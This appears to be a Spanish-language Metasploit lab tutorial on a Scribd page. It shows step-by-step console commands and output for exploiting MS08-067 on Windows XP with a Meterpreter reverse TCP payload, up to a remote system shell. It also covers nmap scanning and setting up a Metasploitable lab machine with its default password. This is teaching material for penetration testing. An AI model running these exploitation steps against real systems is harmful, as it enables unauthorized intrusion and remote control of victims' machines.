Scribd Logo
Upload

Welcome to Scribd!

  • Inicio de Metasploit

    Uploaded by

    hilbert69
    64 views8 pages
    Metasploit inicio

    Copyright

    © © All Rights Reserved

    Available Formats

    DOCX, PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    Metasploit inicio

    Copyright:

    © All Rights Reserved
    Download as DOCX, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    64 views8 pages

    Inicio de Metasploit

    Uploaded by

    hilbert69
    Metasploit inicio

    Copyright:

    © All Rights Reserved
    Download as DOCX, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 8

    INICIO DE METASPLOIT

    service postgresql start


    msfdb init
    msfconsole
    msf > db_status
    [*] postgresql connected to msf3
    msf >
    msf>use exploit/windows/smb/ms08_067_netapi
    msf exploit(ms08_067_netapi) > show options
    Module options (exploit/windows/smb/ms08_067_netapi):

    Name
    ----

    Current Setting Required Description


    --------------- -------- -----------

    RHOST
    RPORT

    yes
    445

    yes

    SMBPIPE BROWSER
    SRVSVC)

    The target address


    Set the SMB service port
    yes

    The pipe name to use (BROWSER,

    Exploit target:

    Id Name
    -- ---0 Automatic Targeting
    msf exploit(ms08_067_netapi) > set RHOST IP_VICTIMA
    RHOST => X.X.X.X
    msf exploit(ms08_067_netapi) > show targets
    Exploit targets:

    Id Name
    -- ----

    0 Automatic Targeting
    1 Windows 2000 Universal
    2 Windows XP SP0/SP1 Universal
    3 Windows 2003 SP0 Universal
    4 Windows XP SP2 English (AlwaysOn NX)
    5 Windows XP SP2 English (NX)
    6 Windows XP SP3 English (AlwaysOn NX)
    7 Windows XP SP3 English (NX)
    8 Windows XP SP2 Arabic (NX)
    9 Windows XP SP2 Chinese - Traditional / Taiwan (NX)
    10 Windows XP SP2 Chinese - Simplified (NX)
    11 Windows XP SP2 Chinese - Traditional (NX)
    12 Windows XP SP2 Czech (NX)
    13 Windows XP SP2 Danish (NX)
    14 Windows XP SP2 German (NX)
    15 Windows XP SP2 Greek (NX)
    16 Windows XP SP2 Spanish (NX)
    17 Windows XP SP2 Finnish (NX)
    18 Windows XP SP2 French (NX)
    19 Windows XP SP2 Hebrew (NX)
    20 Windows XP SP2 Hungarian (NX)
    21 Windows XP SP2 Italian (NX)
    22 Windows XP SP2 Japanese (NX)
    23 Windows XP SP2 Korean (NX)
    24 Windows XP SP2 Dutch (NX)
    25 Windows XP SP2 Norwegian (NX)
    26 Windows XP SP2 Polish (NX)
    27 Windows XP SP2 Portuguese - Brazilian (NX)

    28 Windows XP SP2 Portuguese (NX)


    29 Windows XP SP2 Russian (NX)
    30 Windows XP SP2 Swedish (NX)
    31 Windows XP SP2 Turkish (NX)
    32 Windows XP SP3 Arabic (NX)
    33 Windows XP SP3 Chinese - Traditional / Taiwan (NX)
    34 Windows XP SP3 Chinese - Simplified (NX)
    35 Windows XP SP3 Chinese - Traditional (NX)
    36 Windows XP SP3 Czech (NX)
    37 Windows XP SP3 Danish (NX)
    38 Windows XP SP3 German (NX)
    39 Windows XP SP3 Greek (NX)
    40 Windows XP SP3 Spanish (NX)
    41 Windows XP SP3 Finnish (NX)
    42 Windows XP SP3 French (NX)
    43 Windows XP SP3 Hebrew (NX)
    44 Windows XP SP3 Hungarian (NX)
    45 Windows XP SP3 Italian (NX)
    46 Windows XP SP3 Japanese (NX)
    47 Windows XP SP3 Korean (NX)
    48 Windows XP SP3 Dutch (NX)
    49 Windows XP SP3 Norwegian (NX)
    50 Windows XP SP3 Polish (NX)
    51 Windows XP SP3 Portuguese - Brazilian (NX)
    52 Windows XP SP3 Portuguese (NX)
    53 Windows XP SP3 Russian (NX)
    54 Windows XP SP3 Swedish (NX)
    55 Windows XP SP3 Turkish (NX)

    56 Windows 2003 SP1 English (NO NX)


    57 Windows 2003 SP1 English (NX)
    58 Windows 2003 SP1 Japanese (NO NX)
    59 Windows 2003 SP1 Spanish (NO NX)
    60 Windows 2003 SP1 Spanish (NX)
    61 Windows 2003 SP1 French (NO NX)
    62 Windows 2003 SP1 French (NX)
    63 Windows 2003 SP2 English (NO NX)
    64 Windows 2003 SP2 English (NX)
    65 Windows 2003 SP2 German (NO NX)
    66 Windows 2003 SP2 German (NX)
    67 Windows 2003 SP2 Portuguese - Brazilian (NX)
    68 Windows 2003 SP2 Spanish (NO NX)
    69 Windows 2003 SP2 Spanish (NX)
    70 Windows 2003 SP2 Japanese (NO NX)
    71 Windows 2003 SP2 French (NO NX)
    72 Windows 2003 SP2 French (NX)

    msf exploit(ms08_067_netapi) > set payload


    windows/meterpreter/reverse_tcp
    payload => windows/meterpreter/reverse_tcp
    msf exploit(ms08_067_netapi) >set LHOST X.X.X.X

    msf exploit(ms08_067_netapi) > show options


    Module options (exploit/windows/smb/ms08_067_netapi):
    Name

    Current Setting Required Description

    ----

    --------------- -------- -----------

    RHOST

    X.X.X.X

    RPORT

    445

    yes
    yes

    The target address


    Set the SMB service port

    SMBPIPE BROWSER
    SRVSVC)

    yes

    The pipe name to use (BROWSER,

    Payload options (windows/meterpreter/reverse_tcp):


    Name
    ----

    Current Setting Required Description


    --------------- -------- -----------

    EXITFUNC thread
    LHOST

    X.X.X.X

    LPORT

    4444

    yes
    yes

    Exit technique: seh, thread, process, none

    The listen address

    yes

    The listen port

    Exploit target:
    Id Name
    -- ---0 Automatic Targeting

    msf exploit(ms08_067_netapi) > exploit


    [*] Started reverse handler on X.X.X.X:4444
    [*] Automatically detecting the target...
    [*] Fingerprint: Windows XP - Service Pack 2 - lang:Spanish
    [*] Selected Target: Windows XP SP2 Spanish (NX)
    [*] Attempting to trigger the vulnerability...
    [*] Sending stage (752128 bytes) to X.X.X.X

    meterpreter > sysinfo


    Computer
    OS

    : TMWINXP01
    : Windows XP (Build 2600, Service Pack 2).

    Architecture

    : x86

    System Language : es_SP


    Meterpreter

    : x86/win32

    meterpreter > shell


    Process 1652 created.
    Channel 1 created.
    Microsoft Windows XP [Versin 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.
    C:\WINDOWS\system32>
    [*] Meterpreter session 1 opened (X.X.X.X:4444 ->
    X.X.X.X:1049) at FECHA/HORA
    meterpreter >

    EN CASO QUE LA MAQUINA ESTE PROTEGIDA, POR EJEMPLO DETRAS


    DE UN FIREWALL...
    msf exploit(ms08_067_netapi) > exploit
    [*] Started reverse handler on 192.168.75.35:4444
    [-] Exploit failed [unreachable]: Rex::ConnectionTimeout
    The connection timed out (192.168.75.90:445).

    EJECUTAMOS NMAP PARA COMPROBARLO


    msf exploit(ms08_067_netapi) > nmap IP_VICTIMA
    [*] exec: nmap X.X.X.X
    Starting Nmap 6.25 ( http://nmap.org ) at 2013-04-08 19:18 CDT
    Nmap scan report for X.X.X.X
    Host is up (0.00019s latency).
    All 1000 scanned ports on X.X.X.X are filtered
    MAC Address: AAAA:BBBB:CCCC (VMware)
    Nmap done: 1 IP address (1 host up) scanned in 34.51 seconds

    CONFIGURACIN DE METASPLOITABLE

    sudo bash
    El password es el mismo: msfadmin
    nano /etc/network/interfaces

    Aqu tendremos que modificar la interfaz "eth0", el resto lo dejamos como


    est.
    auto eth0
    iface eth0 inet static
    gateway X.X.X.1
    address X.X.X.X # de la .2 a la .254
    netmask 255.255.255.0
    A continuacin guardamos con "Ctrl + o", y salimos con "Ctrl + x". Ahora
    reiniciamos el servicio de red con:
    /etc/init.d/networking restart
    Para comprobar que la configuracin de red se ha hecho correctamente y
    que efectivamente se comunica con la mquina anfitriona le hacemos un
    "ping" a la mquina Metasploitable 2.0 desde nuestro equipo anfitrin y
    viceversa.

    Ahora desde vuestra mquina anfitriona podis, para haceros una idea de lo
    vulnerable que es, hacerle un anlisis de puertos a vuestra mquina
    Metasploitable y ver los puertos abiertos que tiene y los servicios que hay
    corriendo. Podis hacerlo con Nmap de esta manera:

    nmap -sV -p0-65535 IP_VICTIMA

    You might also like